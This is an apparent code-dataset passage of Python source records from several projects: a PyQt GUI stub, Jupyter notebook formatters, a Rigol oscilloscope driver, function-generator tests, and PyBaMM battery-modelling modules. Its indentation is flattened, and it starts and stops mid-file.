# Look for the "All Serverns Running" message from stdout.
self.process.expect("All Servers Running")
print("... Done")
sys.stdout.flush()
except EOF:
error = f"Server exited immediately. Is another {self.executable} instance running?" # noqa
raise (Exception(error))
```
|
{
"source": "jed-frey/PyDAT",
"score": 2
}
|
#### File: PyDAT/pydat/dat.py
```python
from PyQt5.uic import loadUiType
from PyQt5 import QtCore, QtWidgets
import sys
from matplotlib.figure import Figure
from matplotlib.backends.backend_qt5agg import (
FigureCanvasQTAgg as FigureCanvas,
NavigationToolbar2QT as NavigationToolbar)
import os
uipath = os.path.join(os.path.dirname(os.path.abspath(__file__)),"ui")
Ui_MainWindow, QMainWindow = loadUiType(os.path.join(uipath,'dat.ui'))
from scipy import signal
class MainWindow(QMainWindow, Ui_MainWindow):
def __init__(self, ):
super(self.__class__, self).__init__()
self.setupUi(self)
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
self.actionQuit.triggered.connect(self.quit)
self.actionQuit.triggered.connect(self.quit)
self.actionQuit.triggered.connect(self.quit)
def ping(self):
print("pong")
def actionOpen(self):
print("self.actionOpen")
def quit(self):
print("Well, bye.")
QtWidgets.qApp.quit()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv) # A new instance of QApplication
main = MainWindow()
main.show()
sys.exit(app.exec_())
```
|
{
"source": "jed-frey/python_cnc3018",
"score": 3
}
|
#### File: python_notebookfmt/NotebookFmt/black_notebook_cells.py
```python
import black
import nbformat
def black_notebook_cells(notebook=None):
with open(notebook, "rb") as fp:
nb = nbformat.read(fp=fp, as_version=nbformat.NO_CONVERT)
markdown_cells = list()
code_cells = list()
for cell in nb["cells"]:
if cell["cell_type"] == "code":
code_cells.append(cell)
elif cell["cell_type"] == "markdown":
markdown_cells.append(cell)
else:
raise Exception(cell["cell_type"])
for code_cell in code_cells:
if code_cell["source"] == "":
continue
try:
code_cell["source"] = black.format_str(
code_cell["source"], line_length=80
)
except:
print("Failed: {}".format(code_cell["source"]))
with open(notebook, "w") as fp:
nbformat.write(nb, fp)
```
#### File: python_notebookfmt/NotebookFmt/isort_notebook_cells.py
```python
import isort
import nbformat
def isort_notebook_cells(notebook):
with open(notebook, "rb") as fp:
nb = nbformat.read(fp=fp, as_version=nbformat.NO_CONVERT)
markdown_cells = list()
code_cells = list()
for cell in nb["cells"]:
if cell["cell_type"] == "code":
code_cells.append(cell)
elif cell["cell_type"] == "markdown":
markdown_cells.append(cell)
else:
raise Exception(cell["cell_type"])
for code_cell in code_cells:
if code_cell["source"] == "":
continue
if "import" in code_cell["source"]:
s = isort.SortImports(file_contents=code_cell.source)
code_cell.source = s.output.strip()
with open(notebook, "w") as fp:
nbformat.write(nb, fp)
```
#### File: jed-frey/python_cnc3018/utils.py
```python
import datetime
import os
from subprocess import check_output
from IPython.display import Image, display_jpeg
resolution = "1600x900"
def picture():
img_root = "images"
img_name = "{}.jpeg".format(datetime.datetime.now())
if not os.path.exists(img_root):
os.makedirs(img_root)
img_path = os.path.join(img_root, img_name)
cmd_array = [
"streamer",
"-c",
"/dev/video1",
"-s",
resolution,
"-o",
img_path,
]
cmd_array
ret = check_output(cmd_array)
display_jpeg(Image(img_path))
```
|
{
"source": "jed-frey/python_ds1000de",
"score": 3
}
|
#### File: python_ds1000de/ds1000de/DS1000DE.py
```python
import visa
from .Acquire import Acquire
from .IO import IO
from .System import System
class DS1000DE(System,
IO):
"""Python class for Rigol DS1000DE series oscilloscopes."""
def __init__(self, device="USB"):
"""DS1000DE Init."""
try:
rm = visa.ResourceManager()
except BaseException:
rm = visa.ResourceManager("@py")
resources = rm.list_resources()
resource = [resource for resource in resources if device in resource]
if len(resource) == 0:
raise Exception("No devices found matching '{}'".format(device))
if len(resource) > 1:
raise Exception(
"Multiple devices found matching '{}':\n\t{}".format(
device, "\n\t".join(resource)))
self.resource = resource[0]
self.inst = rm.open_resource(self.resource)
self.r = self.inst.query
self.w = self.inst.write
self.acquire = Acquire(self)
def reset(self):
"""Reset the scope."""
_, status = self.w("*RST")
assert(status.value == 0)
@property
def idn(self):
"""Return *IDN?."""
return self.r("*IDN?")
@property
def manufacturer(self):
"""Return manufacturer."""
manufacturer, model, serial, software = self.idn.split(",")
return manufacturer
@property
def model(self):
"""Return model."""
manufacturer, model, serial, software = self.idn.split(",")
return model
@property
def serial(self):
"""Return serial."""
manufacturer, model, serial, software = self.idn.split(",")
return serial
@property
def software(self):
"""Return software version."""
manufacturer, model, serial, software = self.idn.split(",")
return software
```
#### File: python_ds1000de/ds1000de/IO.py
```python
class IO(object):
"""IO Functions for interacting with the scope."""
def write(self, cmd):
"""Write a command to the instrument."""
_, status = self.inst.write(cmd)
assert(status.value == 0)
def query(self, cmd):
"""Query the instrument for a value."""
return self.inst.query(cmd)
```
|
{
"source": "jed-frey/python_MDF_Indexer",
"score": 3
}
|
#### File: jed-frey/python_MDF_Indexer/01_MakeMDF-Data.py
```python
import redis
import configparser
import rq
import make_data
def distributed_data_gen():
config = configparser.ConfigParser()
config.read('config.ini')
r = redis.StrictRedis(
host=config["redis"]["host"],
port=config["redis"]["port"],
db=config["redis"]["rq"],
)
q = rq.Queue(connection=r)
for idx in range(1000):
try:
f = q.enqueue(make_data.random_data)
print("{:04d}: {}".format(idx, f))
except KeyboardInterrupt:
print("\n\nCanceled\n\n")
break
except:
raise
def local_data_gen():
for idx in range(1000):
try:
file = make_data.random_data()
print("{:04d}: {}".format(idx, file))
except KeyboardInterrupt:
print("\n\nDone\n\n")
break
if __name__ == "__main__":
local_data_gen()
```
|
{
"source": "jed-frey/python-mhs5200a",
"score": 3
}
|
#### File: python-mhs5200a/tests/test_frequency.py
```python
def test_freq_01(chan1):
freq = 1
chan1.frequency = freq
assert chan1.frequency == freq
def test_freq_10(chan1):
freq = 10
chan1.frequency = freq
assert chan1.frequency == freq
def test_freq_100(chan1):
freq = 100
chan1.frequency = freq
assert chan1.frequency == freq
def test_freq_1MHz(chan1):
chan1.frequency = "1MHz"
assert chan1.frequency == 1000000
def test_freq_1kHz(chan1):
chan1.frequency = "1kHz"
assert chan1.frequency == 1000
```
|
{
"source": "jedgedrudd/PyBaMM",
"score": 2
}
|
#### File: examples/scripts/create-model.py
```python
import pybamm
import numpy as np
import matplotlib.pyplot as plt
# 1. Initialise model ------------------------------------------------------------------
model = pybamm.BaseModel()
# 2. Define parameters and variables ---------------------------------------------------
# dimensional parameters
k_dim = pybamm.Parameter("Reaction rate constant")
L_0_dim = pybamm.Parameter("Initial thickness")
V_hat_dim = pybamm.Parameter("Partial molar volume")
c_inf_dim = pybamm.Parameter("Bulk electrolyte solvent concentration")
def D_dim(cc):
return pybamm.FunctionParameter("Diffusivity", cc)
# dimensionless parameters
k = k_dim * L_0_dim / D_dim(c_inf_dim)
V_hat = V_hat_dim * c_inf_dim
def D(cc):
c_dim = c_inf_dim * cc
return D_dim(c_dim) / D_dim(c_inf_dim)
# variables
x = pybamm.SpatialVariable("x", domain="SEI layer", coord_sys="cartesian")
c = pybamm.Variable("Solvent concentration", domain="SEI layer")
L = pybamm.Variable("SEI thickness")
# 3. State governing equations ---------------------------------------------------------
R = k * pybamm.BoundaryValue(c, "left") # SEI reaction flux
N = -(1 / L) * D(c) * pybamm.grad(c) # solvent flux
dcdt = (V_hat * R) * pybamm.inner(x / L, pybamm.grad(c)) - (1 / L) * pybamm.div(
N
) # solvent concentration governing equation
dLdt = V_hat * R # SEI thickness governing equation
model.rhs = {c: dcdt, L: dLdt} # add to model
# 4. State boundary conditions ---------------------------------------------------------
D_left = pybamm.BoundaryValue(
D(c), "left"
) # pybamm requires BoundaryValue(D(c)) and not D(BoundaryValue(c))
grad_c_left = L * R / D_left # left bc
c_right = pybamm.Scalar(1) # right bc
# add to model
model.boundary_conditions = {
c: {"left": (grad_c_left, "Neumann"), "right": (c_right, "Dirichlet")}
}
# 5. State initial conditions ----------------------------------------------------------
model.initial_conditions = {c: pybamm.Scalar(1), L: pybamm.Scalar(1)}
# 6. State output variables ------------------------------------------------------------
model.variables = {
"SEI thickness": L,
"SEI growth rate": dLdt,
"Solvent concentration": c,
"SEI thickness [m]": L_0_dim * L,
"SEI growth rate [m/s]": (D_dim(c_inf_dim) / L_0_dim) * dLdt,
"Solvent concentration [mols/m^3]": c_inf_dim * c,
}
"--------------------------------------------------------------------------------------"
"Using the model"
# define geometry
geometry = {
"SEI layer": {"primary": {x: {"min": pybamm.Scalar(0), "max": pybamm.Scalar(1)}}}
}
# diffusivity function
def Diffusivity(cc):
return cc * 10 ** (-5)
# parameter values (not physically based, for example only!)
param = pybamm.ParameterValues(
{
"Reaction rate constant": 20,
"Initial thickness": 1e-6,
"Partial molar volume": 10,
"Bulk electrolyte solvent concentration": 1,
"Diffusivity": Diffusivity,
}
)
# process model and geometry
param.process_model(model)
param.process_geometry(geometry)
# mesh and discretise
submesh_types = {"SEI layer": pybamm.Uniform1DSubMesh}
var_pts = {x: 50}
mesh = pybamm.Mesh(geometry, submesh_types, var_pts)
spatial_methods = {"SEI layer": pybamm.FiniteVolume}
disc = pybamm.Discretisation(mesh, spatial_methods)
disc.process_model(model)
# solve
solver = pybamm.ScipySolver()
t = np.linspace(0, 1, 100)
solution = solver.solve(model, t)
# Extract output variables
L_out = pybamm.ProcessedVariable(
model.variables["SEI thickness"], solution.t, solution.y, mesh
)
# plot
plt.plot(solution.t, L_out(solution.t))
plt.xlabel("Time")
plt.ylabel("SEI thickness")
plt.show()
```
#### File: electrolytes/lipf6_Marquis2019/electrolyte_conductivity_Capiglia1999.py
```python
import autograd.numpy as np
def electrolyte_conductivity_Capiglia1999(c_e, T, T_inf, E_k_e, R_g):
"""
Conductivity of LiPF6 in EC:DMC as a function of ion concentration. The original
data is from [1]. The fit is from Dualfoil [2].
References
----------
.. [1] C Capiglia et al. 7Li and 19F diffusion coefficients and thermal
properties of non-aqueous electrolyte solutions for rechargeable lithium batteries.
Journal of power sources 81 (1999): 859-862.
.. [2] http://www.cchem.berkeley.edu/jsngrp/fortran.html
Parameters
----------
c_e: :class: `numpy.Array`
Dimensional electrolyte concentration
T: :class: `numpy.Array`
Dimensional temperature
T_inf: double
Reference temperature
E_k_e: double
Electrolyte conductivity activation energy
R_g: double
The ideal gas constant
Returns
-------
:`numpy.Array`
Solid diffusivity
"""
sigma_e = (
0.0911
+ 1.9101 * (c_e / 1000)
- 1.052 * (c_e / 1000) ** 2
+ 0.1554 * (c_e / 1000) ** 3
)
arrhenius = np.exp(E_k_e / R_g * (1 / T_inf - 1 / T))
return sigma_e * arrhenius
```
#### File: pybamm/expression_tree/broadcasts.py
```python
import numbers
import numpy as np
import pybamm
class Broadcast(pybamm.SpatialOperator):
"""A node in the expression tree representing a broadcasting operator.
Broadcasts a child to a specified domain. After discretisation, this will evaluate
to an array of the right shape for the specified domain.
Parameters
----------
child : :class:`Symbol`
child node
broadcast_domain : iterable of str
Primary domain for broadcast. This will become the domain of the symbol
auxiliary_domain : iterable of str
Secondary domain for broadcast. Currently, this is only used for testing that
symbols have the right shape.
broadcast_type : str, optional
Whether to broadcast to the full domain (primary and secondary) or only in the
primary direction. Default is "full".
name : str
name of the node
**Extends:** :class:`SpatialOperator`
"""
def __init__(
self,
child,
broadcast_domain,
auxiliary_domains=None,
broadcast_type="full",
name=None,
):
# Convert child to scalar if it is a number
if isinstance(child, numbers.Number):
child = pybamm.Scalar(child)
if name is None:
name = "broadcast"
# perform some basic checks and set attributes
domain = self.check_and_set_domain_and_broadcast_type(
child, broadcast_domain, broadcast_type
)
self.broadcast_type = broadcast_type
self.broadcast_domain = broadcast_domain
if auxiliary_domains is None:
if child.domain != []:
auxiliary_domains = {"secondary": child.domain}
else:
auxiliary_domains = {}
super().__init__(name, child, domain, auxiliary_domains)
def check_and_set_domain_and_broadcast_type(
self, child, broadcast_domain, broadcast_type
):
"""
Set broadcast domain and broadcast type, performing basic checks to make sure
it is compatible with the child
"""
# Acceptable broadcast types
if broadcast_type not in ["primary", "secondary", "full"]:
raise KeyError(
"""Broadcast type must be either: 'primary', 'secondary', or 'full' and
not {}""".format(
broadcast_type
)
)
domain = broadcast_domain
# Variables on the current collector can only be broadcast to 'primary'
if broadcast_type == "full":
if child.domain == ["current collector"]:
raise ValueError(
"""
Variables on the current collector must be broadcast to 'primary'
only
"""
)
return domain
def _unary_simplify(self, child):
""" See :meth:`pybamm.UnaryOperator.simplify()`. """
return Broadcast(
child, self.broadcast_domain, self.auxiliary_domains, self.broadcast_type
)
def _unary_new_copy(self, child):
""" See :meth:`pybamm.UnaryOperator.simplify()`. """
return Broadcast(
child, self.broadcast_domain, self.auxiliary_domains, self.broadcast_type
)
def evaluate_for_shape(self):
"""
Returns a vector of NaNs to represent the shape of a Broadcast.
See :meth:`pybamm.Symbol.evaluate_for_shape_using_domain()`
"""
child_eval = self.children[0].evaluate_for_shape()
vec = pybamm.evaluate_for_shape_using_domain(self.domain)
if self.broadcast_type == "primary":
return np.outer(child_eval, vec).reshape(-1, 1)
elif self.broadcast_type == "full":
return child_eval * vec
class PrimaryBroadcast(Broadcast):
"""A node in the expression tree representing a primary broadcasting operator.
Broadcasts in a `primary` dimension only. That is, makes explicit copies
Parameters
----------
child : :class:`Symbol`
child node
broadcast_domain : iterable of str
Primary domain for broadcast. This will become the domain of the symbol
name : str
name of the node
**Extends:** :class:`SpatialOperator`
"""
def __init__(self, child, broadcast_domain, name=None):
super().__init__(child, broadcast_domain, broadcast_type="primary", name=name)
def _unary_simplify(self, child):
""" See :meth:`pybamm.UnaryOperator.simplify()`. """
return PrimaryBroadcast(child, self.broadcast_domain)
def _unary_new_copy(self, child):
""" See :meth:`pybamm.UnaryOperator.simplify()`. """
return PrimaryBroadcast(child, self.broadcast_domain)
def evaluate_for_shape(self):
"""
Returns a vector of NaNs to represent the shape of a Broadcast.
See :meth:`pybamm.Symbol.evaluate_for_shape_using_domain()`
"""
child_eval = self.children[0].evaluate_for_shape()
vec = pybamm.evaluate_for_shape_using_domain(self.domain)
return np.outer(child_eval, vec).reshape(-1, 1)
class FullBroadcast(Broadcast):
"A class for full broadcasts"
def __init__(self, child, broadcast_domain, auxiliary_domains, name=None):
if auxiliary_domains == "current collector":
auxiliary_domains = {"secondary": "current collector"}
super().__init__(
child,
broadcast_domain,
auxiliary_domains=auxiliary_domains,
broadcast_type="full",
name=name,
)
def _unary_simplify(self, child):
""" See :meth:`pybamm.UnaryOperator.simplify()`. """
return FullBroadcast(child, self.broadcast_domain, self.auxiliary_domains)
def _unary_new_copy(self, child):
""" See :meth:`pybamm.UnaryOperator.simplify()`. """
return FullBroadcast(child, self.broadcast_domain, self.auxiliary_domains)
def evaluate_for_shape(self):
"""
Returns a vector of NaNs to represent the shape of a Broadcast.
See :meth:`pybamm.Symbol.evaluate_for_shape_using_domain()`
"""
child_eval = self.children[0].evaluate_for_shape()
vec = pybamm.evaluate_for_shape_using_domain(
self.domain, self.auxiliary_domains
)
return child_eval * vec
```
#### File: pybamm/expression_tree/evaluate.py
```python
import pybamm
# need numpy imported for code generated in EvaluatorPython
import numpy as np # noqa: F401
import scipy.sparse # noqa: F401
from collections import OrderedDict
def id_to_python_variable(symbol_id, constant=False):
"""
This function defines the format for the python variable names used in find_symbols
and to_python. Variable names are based on a nodes' id to make them unique
"""
if constant:
var_format = "self.const_{:05d}"
else:
var_format = "self.var_{:05d}"
# Need to replace "-" character to make them valid python variable names
return var_format.format(symbol_id).replace("-", "m")
def find_symbols(symbol, constant_symbols, variable_symbols):
"""
This function converts an expression tree to a dictionary of node id's and strings
specifying valid python code to calculate that nodes value, given y and t.
The function distinguishes between nodes that represent constant nodes in the tree
(e.g. a pybamm.Matrix), and those that are variable (e.g. subtrees that contain
pybamm.StateVector). The former are put in `constant_symbols`, the latter in
`variable_symbols`
Note that it is important that the arguments `constant_symbols` and
`variable_symbols` be and *ordered* dict, since the final ordering of the code lines
are important for the calculations. A dict is specified rather than a list so that
identical subtrees (which give identical id's) are not recalculated in the code
Parameters
----------
symbol : :class:`pybamm.Symbol`
The symbol or expression tree to convert
constant_symbol: collections.OrderedDict
The output dictionary of constant symbol ids to lines of code
variable_symbol: collections.OrderedDict
The output dictionary of variable (with y or t) symbol ids to lines of code
"""
if symbol.is_constant():
constant_symbols[symbol.id] = symbol.evaluate()
return
# process children recursively
for child in symbol.children:
find_symbols(child, constant_symbols, variable_symbols)
# calculate the variable names that will hold the result of calculating the
# children variables
children_vars = [
id_to_python_variable(child.id, child.is_constant())
for child in symbol.children
]
if isinstance(symbol, pybamm.BinaryOperator):
# Multiplication and Division need special handling for scipy sparse matrices
# TODO: we can pass through a dummy y and t to get the type and then hardcode
# the right line, avoiding these checks
if isinstance(symbol, pybamm.Multiplication):
symbol_str = (
"scipy.sparse.csr_matrix({0}.multiply({1})) "
"if scipy.sparse.issparse({0}) else "
"scipy.sparse.csr_matrix({1}.multiply({0})) "
"if scipy.sparse.issparse({1}) else "
"{0} * {1}".format(children_vars[0], children_vars[1])
)
elif isinstance(symbol, pybamm.Division):
symbol_str = (
"scipy.sparse.csr_matrix({0}.multiply(1/{1})) "
"if scipy.sparse.issparse({0}) else "
"{0} / {1}".format(children_vars[0], children_vars[1])
)
elif isinstance(symbol, pybamm.Inner):
symbol_str = (
"{0}.multiply({1}) "
"if scipy.sparse.issparse({0}) else "
"{1}.multiply({0}) "
"if scipy.sparse.issparse({1}) else "
"{0} * {1}".format(children_vars[0], children_vars[1])
)
elif isinstance(symbol, pybamm.Outer):
symbol_str = "np.outer({}, {}).reshape(-1, 1)".format(
children_vars[0], children_vars[1]
)
elif isinstance(symbol, pybamm.Kron):
symbol_str = "scipy.sparse.csr_matrix(scipy.sparse.kron({}, {}))".format(
children_vars[0], children_vars[1]
)
else:
symbol_str = children_vars[0] + " " + symbol.name + " " + children_vars[1]
elif isinstance(symbol, pybamm.UnaryOperator):
# Index has a different syntax than other univariate operations
if isinstance(symbol, pybamm.Index):
symbol_str = "{}[{}:{}]".format(
children_vars[0], symbol.slice.start, symbol.slice.stop
)
else:
symbol_str = symbol.name + children_vars[0]
# For a Function we create two lines of code, one in constant_symbols that
# contains the function handle, the other in variable_symbols that calls that
# function on the children variables
elif isinstance(symbol, pybamm.Function):
constant_symbols[symbol.id] = symbol.function
funct_var = id_to_python_variable(symbol.id, True)
children_str = ""
for child_var in children_vars:
if children_str == "":
children_str = child_var
else:
children_str += ", " + child_var
symbol_str = "{}({})".format(funct_var, children_str)
elif isinstance(symbol, pybamm.Concatenation):
# don't bother to concatenate if there is only a single child
if isinstance(symbol, pybamm.NumpyConcatenation):
if len(children_vars) > 1:
symbol_str = "np.concatenate(({}))".format(",".join(children_vars))
else:
symbol_str = "{}".format(",".join(children_vars))
elif isinstance(symbol, pybamm.SparseStack):
if len(children_vars) > 1:
symbol_str = "scipy.sparse.vstack(({}))".format(",".join(children_vars))
else:
symbol_str = "{}".format(",".join(children_vars))
# DomainConcatenation specifies a particular ordering for the concatenation,
# which we must follow
elif isinstance(symbol, pybamm.DomainConcatenation):
slice_starts = []
all_child_vectors = []
for i in range(symbol.secondary_dimensions_npts):
child_vectors = []
for child_var, slices in zip(children_vars, symbol._children_slices):
for child_dom, child_slice in slices.items():
slice_starts.append(symbol._slices[child_dom][i].start)
child_vectors.append(
"{}[{}:{}]".format(
child_var, child_slice[i].start, child_slice[i].stop
)
)
all_child_vectors.extend(
[v for _, v in sorted(zip(slice_starts, child_vectors))]
)
if len(children_vars) > 1 or symbol.secondary_dimensions_npts > 1:
symbol_str = "np.concatenate(({}))".format(",".join(all_child_vectors))
else:
symbol_str = "{}".format(",".join(children_vars))
else:
raise NotImplementedError
# Note: we assume that y is being passed as a column vector
elif isinstance(symbol, pybamm.StateVector):
symbol_str = "y[:{}][{}]".format(
len(symbol.evaluation_array), symbol.evaluation_array
)
elif isinstance(symbol, pybamm.Time):
symbol_str = "t"
else:
raise NotImplementedError(
"Not implemented for a symbol of type '{}'".format(type(symbol))
)
variable_symbols[symbol.id] = symbol_str
def to_python(symbol, debug=False):
"""
This function converts an expression tree into a dict of constant input values, and
valid python code that acts like the tree's :func:`pybamm.Symbol.evaluate` function
Parameters
----------
symbol : :class:`pybamm.Symbol`
The symbol to convert to python code
debug : bool
If set to True, the function also emits debug code
Returns
-------
collections.OrderedDict:
dict mapping node id to a constant value. Represents all the constant nodes in
the expression tree
str:
valid python code that will evaluate all the variable nodes in the tree.
"""
constant_values = OrderedDict()
variable_symbols = OrderedDict()
find_symbols(symbol, constant_values, variable_symbols)
line_format = "{} = {}"
if debug:
variable_lines = [
"print('{}'); ".format(
line_format.format(id_to_python_variable(symbol_id, False), symbol_line)
)
+ line_format.format(id_to_python_variable(symbol_id, False), symbol_line)
+ "; print(type({0}),{0}.shape)".format(
id_to_python_variable(symbol_id, False)
)
for symbol_id, symbol_line in variable_symbols.items()
]
else:
variable_lines = [
line_format.format(id_to_python_variable(symbol_id, False), symbol_line)
for symbol_id, symbol_line in variable_symbols.items()
]
return constant_values, "\n".join(variable_lines)
class EvaluatorPython:
"""
Converts a pybamm expression tree into pure python code that will calculate the
result of calling `evaluate(t, y)` on the given expression tree.
Parameters
----------
symbol : :class:`pybamm.Symbol`
The symbol to convert to python code
"""
def __init__(self, symbol):
constants, self._variable_function = pybamm.to_python(symbol, debug=False)
# store all the constant symbols in the tree as internal variables of this
# object
for symbol_id, value in constants.items():
setattr(
self, id_to_python_variable(symbol_id, True).replace("self.", ""), value
)
# calculate the final variable that will output the result of calling `evaluate`
# on `symbol`
self._result_var = id_to_python_variable(symbol.id, symbol.is_constant())
# compile the generated python code
self._variable_compiled = compile(
self._variable_function, self._result_var, "exec"
)
# compile the line that will return the output of `evaluate`
self._return_compiled = compile(
self._result_var, "return" + self._result_var, "eval"
)
def evaluate(self, t=None, y=None, known_evals=None):
"""
Acts as a drop-in replacement for :func:`pybamm.Symbol.evaluate`
"""
# generated code assumes y is a column vector
if y is not None and y.ndim == 1:
y = y.reshape(-1, 1)
# execute code
exec(self._variable_compiled)
# don't need known_evals, but need to reproduce Symbol.evaluate signature
if known_evals is not None:
return eval(self._return_compiled), known_evals
else:
return eval(self._return_compiled)
```
#### File: pybamm/expression_tree/state_vector.py
```python
import pybamm
import numpy as np
from scipy.sparse import csr_matrix, vstack
class StateVector(pybamm.Symbol):
"""
node in the expression tree that holds a slice to read from an external vector type
Parameters
----------
y_slice: slice
the slice of an external y to read
name: str, optional
the name of the node
domain : iterable of str, optional
list of domains the parameter is valid over, defaults to empty list
auxiliary_domains : dict of str, optional
dictionary of auxiliary domains
evaluation_array : list, optional
List of boolean arrays representing slices. Default is None, in which case the
evaluation_array is computed from y_slices.
*Extends:* :class:`Array`
"""
def __init__(
self,
*y_slices,
name=None,
domain=None,
auxiliary_domains=None,
evaluation_array=None,
):
for y_slice in y_slices:
if not isinstance(y_slice, slice):
raise TypeError("all y_slices must be slice objects")
if name is None:
if y_slices[0].start is None:
name = "y[:{:d}]".format(y_slice.stop)
else:
name = "y[{:d}:{:d}".format(y_slices[0].start, y_slices[0].stop)
if len(y_slices) > 1:
name += ",{:d}:{:d}".format(y_slices[1].start, y_slices[1].stop)
if len(y_slices) > 2:
name += ",...,{:d}:{:d}]".format(
y_slices[-1].start, y_slices[-1].stop
)
else:
name += "]"
else:
name += "]"
if domain is None:
domain = []
if auxiliary_domains is None:
auxiliary_domains = {}
self._y_slices = y_slices
self._first_point = y_slices[0].start
self._last_point = y_slices[-1].stop
self.set_evaluation_array(y_slices, evaluation_array)
super().__init__(name=name, domain=domain, auxiliary_domains=auxiliary_domains)
@property
def y_slices(self):
return self._y_slices
@property
def first_point(self):
return self._first_point
@property
def last_point(self):
return self._last_point
@property
def evaluation_array(self):
"""Array to use for evaluating"""
return self._evaluation_array
@property
def size(self):
return self.evaluation_array.count(True)
def set_evaluation_array(self, y_slices, evaluation_array):
"Set evaluation array using slices"
if evaluation_array is not None and pybamm.settings.debug_mode is False:
self._evaluation_array = evaluation_array
else:
array = np.zeros(y_slices[-1].stop)
for y_slice in y_slices:
array[y_slice] = True
self._evaluation_array = [bool(x) for x in array]
def set_id(self):
""" See :meth:`pybamm.Symbol.set_id()` """
self._id = hash(
(self.__class__, self.name, tuple(self.evaluation_array))
+ tuple(self.domain)
)
def _base_evaluate(self, t=None, y=None):
""" See :meth:`pybamm.Symbol._base_evaluate()`. """
if y is None:
raise TypeError("StateVector cannot evaluate input 'y=None'")
if y.shape[0] < len(self.evaluation_array):
raise ValueError(
"y is too short, so value with slice is smaller than expected"
)
else:
out = (y[: len(self._evaluation_array)])[self._evaluation_array]
if out.ndim == 1:
out = out[:, np.newaxis]
return out
def jac(self, variable):
"""
Differentiate a slice of a StateVector of size m with respect to another
slice of a StateVector of size n. This returns a (sparse) matrix of size
m x n with ones where the y slices match, and zeros elsewhere.
Parameters
----------
variable : :class:`pybamm.Symbol`
The variable with respect to which to differentiate
"""
if len(variable.y_slices) > 1:
raise NotImplementedError(
"Jacobian only implemented for a single-slice StateVector"
)
variable_y_indices = np.arange(variable.first_point, variable.last_point)
jac = csr_matrix((0, np.size(variable_y_indices)))
for y_slice in self.y_slices:
# Get indices of state vectors
slice_indices = np.arange(y_slice.start, y_slice.stop)
# Return zeros of correct size if no entries match
if np.size(np.intersect1d(slice_indices, variable_y_indices)) == 0:
jac = csr_matrix((np.size(slice_indices), np.size(variable_y_indices)))
else:
# Populate entries corresponding to matching y slices, and shift so
# that the matrix is the correct size
row = np.intersect1d(slice_indices, variable_y_indices) - y_slice.start
col = (
np.intersect1d(slice_indices, variable_y_indices)
- variable.first_point
)
data = np.ones_like(row)
jac = vstack(
[
jac,
csr_matrix(
(data, (row, col)),
shape=(np.size(slice_indices), np.size(variable_y_indices)),
),
]
)
return pybamm.Matrix(jac)
def new_copy(self):
""" See :meth:`pybamm.Symbol.new_copy()`. """
return StateVector(
*self.y_slices,
name=self.name,
domain=self.domain,
auxiliary_domains=self.auxiliary_domains,
evaluation_array=self.evaluation_array,
)
def evaluate_for_shape(self):
"""
Returns a vector of NaNs to represent the shape of a StateVector.
The size of a StateVector is the number of True elements in its evaluation_array
See :meth:`pybamm.Symbol.evaluate_for_shape()`
"""
return np.nan * np.ones((self.size, 1))
```
#### File: pybamm/expression_tree/vector.py
```python
import pybamm
import numpy as np
from scipy.sparse import csr_matrix
class Vector(pybamm.Array):
"""node in the expression tree that holds a vector type (e.g. :class:`numpy.array`)
**Extends:** :class:`Array`
Parameters
----------
entries : numpy.array
the array associated with the node
name : str, optional
the name of the node
domain : iterable of str, optional
list of domains the parameter is valid over, defaults to empty list
"""
def __init__(self, entries, name=None, domain=[], entries_string=None):
# make sure that entries are a vector (can be a column vector)
if entries.ndim == 1:
entries = entries[:, np.newaxis]
if entries.shape[1] != 1:
raise ValueError(
"""
Entries must have 1 dimension or be column vector, not have shape {}
""".format(
entries.shape
)
)
if name is None:
name = "Column vector of length {!s}".format(entries.shape[0])
super().__init__(entries, name, domain, entries_string)
def _jac(self, variable):
""" See :meth:`pybamm.Symbol._jac()`. """
# Return zeros of correct size
jac = csr_matrix((self.size, variable.evaluation_array.count(True)))
return pybamm.Matrix(jac)
```
#### File: full_battery_models/lithium_ion/base_lithium_ion_model.py
```python
import pybamm
class BaseModel(pybamm.BaseBatteryModel):
"""
Overwrites default parameters from Base Model with default parameters for
lithium-ion models
**Extends:** :class:`pybamm.BaseBatteryModel`
"""
def __init__(self, options=None, name="Unnamed lithium-ion model"):
super().__init__(options, name)
self.param = pybamm.standard_parameters_lithium_ion
def set_standard_output_variables(self):
super().set_standard_output_variables()
# Current
i_cell = pybamm.standard_parameters_lithium_ion.current_with_time
i_cell_dim = (
pybamm.standard_parameters_lithium_ion.dimensional_current_density_with_time
)
I = pybamm.standard_parameters_lithium_ion.dimensional_current_with_time
self.variables.update(
{
"Total current density": i_cell,
"Total current density [A.m-2]": i_cell_dim,
"Current [A]": I,
}
)
# Time
time_scale = pybamm.standard_parameters_lithium_ion.tau_discharge
self.variables.update(
{
"Time [s]": pybamm.t * time_scale,
"Time [min]": pybamm.t * time_scale / 60,
"Time [h]": pybamm.t * time_scale / 3600,
"Discharge capacity [A.h]": I * pybamm.t * time_scale / 3600,
}
)
# Particle concentration and position
self.variables.update(
{
"Negative particle concentration": None,
"Positive particle concentration": None,
"Negative particle surface concentration": None,
"Positive particle surface concentration": None,
"Negative particle concentration [mol.m-3]": None,
"Positive particle concentration [mol.m-3]": None,
"Negative particle surface concentration [mol.m-3]": None,
"Positive particle surface concentration [mol.m-3]": None,
}
)
var = pybamm.standard_spatial_vars
param = pybamm.geometric_parameters
self.variables.update(
{
"r_n": var.r_n,
"r_n [m]": var.r_n * param.R_n,
"r_p": var.r_p,
"r_p [m]": var.r_p * param.R_p,
}
)
def set_reactions(self):
# Should probably refactor as this is a bit clunky at the moment
# Maybe each reaction as a Reaction class so we can just list names of classes
icd = " interfacial current density"
self.reactions = {
"main": {
"Negative": {
"s": 1 - self.param.t_plus,
"aj": "Negative electrode" + icd,
},
"Positive": {
"s": 1 - self.param.t_plus,
"aj": "Positive electrode" + icd,
},
}
}
```
#### File: submodels/current_collector/base_current_collector.py
```python
import pybamm
class BaseModel(pybamm.BaseSubModel):
"""Base class for current collector submodels
Parameters
----------
param : parameter class
The parameters to use for this submodel
**Extends:** :class:`pybamm.BaseSubModel`
"""
def __init__(self, param):
super().__init__(param)
def get_coupled_variables(self, variables):
# 1D models determine phi_s_cp
phi_s_cn = variables["Negative current collector potential"]
phi_s_cp = variables["Positive current collector potential"]
variables = self._get_standard_potential_variables(phi_s_cn, phi_s_cp)
return variables
def _get_standard_negative_potential_variables(self, phi_s_cn):
"""
A private function to obtain the standard variables which
can be derived from the negative potential in the current collector.
Parameters
----------
phi_cc : :class:`pybamm.Symbol`
